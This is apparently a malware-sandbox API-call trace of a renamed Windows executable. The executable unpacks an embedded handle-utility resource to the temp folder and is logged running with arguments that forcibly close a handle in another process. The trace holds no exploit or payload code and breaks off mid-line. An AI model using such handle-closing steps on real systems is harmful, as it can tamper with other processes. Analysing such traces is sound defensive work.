!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0194.765] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0194.765] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿG\x1fÒ|äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0194.765] GetLastError () returned 0x0 [0194.765] SetLastError (dwErrCode=0x0) [0194.766] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0194.766] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0194.766] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0194.766] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0194.766] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿG\x1fÒ|äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0194.768] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x80) returned 0x6491e8 [0194.769] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0194.769] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0194.769] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x6491e8) returned 0x80 [0194.769] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0194.769] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0194.769] GetCurrentProcess () returned 0xffffffff [0194.769] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0194.770] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0194.770] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0194.773] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0194.773] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0194.773] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0194.773] LockResource (hResData=0x43c648) returned 0x43c648 [0194.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x6496b8 [0194.774] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0194.792] GetLastError () returned 0x20 [0194.792] GetLastError () returned 0x20 [0194.792] SetLastError (dwErrCode=0x20) [0194.792] GetLastError () returned 0x20 [0194.793] SetLastError (dwErrCode=0x20) [0194.793] GetLastError () returned 0x20 [0194.793] SetLastError (dwErrCode=0x20) [0194.794] GetLastError () returned 0x20 [0194.794] SetLastError (dwErrCode=0x20) [0194.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1000) returned 0x6496d8 [0194.795] GetLastError () returned 0x20 [0194.796] SetLastError (dwErrCode=0x20) [0194.796] GetLastError () returned 0x20 [0194.796] SetLastError (dwErrCode=0x20) [0194.796] GetLastError () returned 0x20 [0194.796] SetLastError (dwErrCode=0x20) [0194.796] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e38c | out: lpMode=0x18e38c) returned 1 [0195.351] WriteFile (in: hFile=0x7, lpBuffer=0x18ea68*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e394, lpOverlapped=0x0 | out: lpBuffer=0x18ea68*, lpNumberOfBytesWritten=0x18e394*=0x49, lpOverlapped=0x0) returned 1 [0195.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6487b8 | out: hHeap=0x630000) returned 1 [0195.355] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0195.355] ExitProcess (uExitCode=0x1) [0195.356] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x647090 | out: hHeap=0x630000) returned 1 Process: id = "189" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x2d4d9000" os_pid = "0xa38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0x1c4" cmd_line = "tdq963ii.exe -accepteula -c 14C -y -p 2880 -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 730 os_tid = 0xa28 [0193.688] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0193.688] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0193.688] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0193.688] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0193.688] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0193.689] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0193.689] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0193.689] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0193.689] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0193.689] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0193.689] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0193.689] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0193.689] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0193.690] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0193.690] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0193.690] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0193.690] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0193.690] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0193.690] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0193.690] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0193.690] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0193.690] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0193.691] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0193.691] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0193.691] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0193.691] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0193.691] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0193.691] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0193.691] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0193.691] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0193.692] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0193.692] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0193.692] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0193.692] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0193.692] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0193.692] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0193.692] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0193.692] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0193.693] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0193.693] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0193.693] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0193.693] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0193.693] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0193.693] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0193.693] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0193.693] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0193.693] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0193.694] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0193.694] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0193.694] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0193.694] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0193.694] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0193.694] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0193.694] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0193.694] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0193.695] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0193.695] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0193.695] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0193.695] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0193.695] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0193.695] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0193.696] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0193.696] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0193.696] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0193.696] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0193.696] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0193.696] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0193.696] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0193.697] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0193.697] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0193.697] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0193.697] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0193.697] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0193.697] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0193.698] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0193.698] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0193.698] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0193.698] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0193.698] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0193.698] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0193.698] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0193.698] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0193.699] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0193.699] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0193.699] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0193.699] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0193.699] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0193.699] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0193.700] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0193.700] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0193.700] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0193.700] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0193.700] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0193.701] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0193.701] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0193.701] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0193.701] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0193.701] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0193.702] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0193.702] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0193.702] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0193.702] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0193.703] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0193.703] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0193.703] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0193.969] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0193.970] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0193.970] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0193.970] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0193.970] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0193.970] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0193.970] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0193.971] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0193.971] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0193.971] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0193.971] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0193.971] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0193.972] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0193.972] GetProcAddress (hModule=0x77130000, 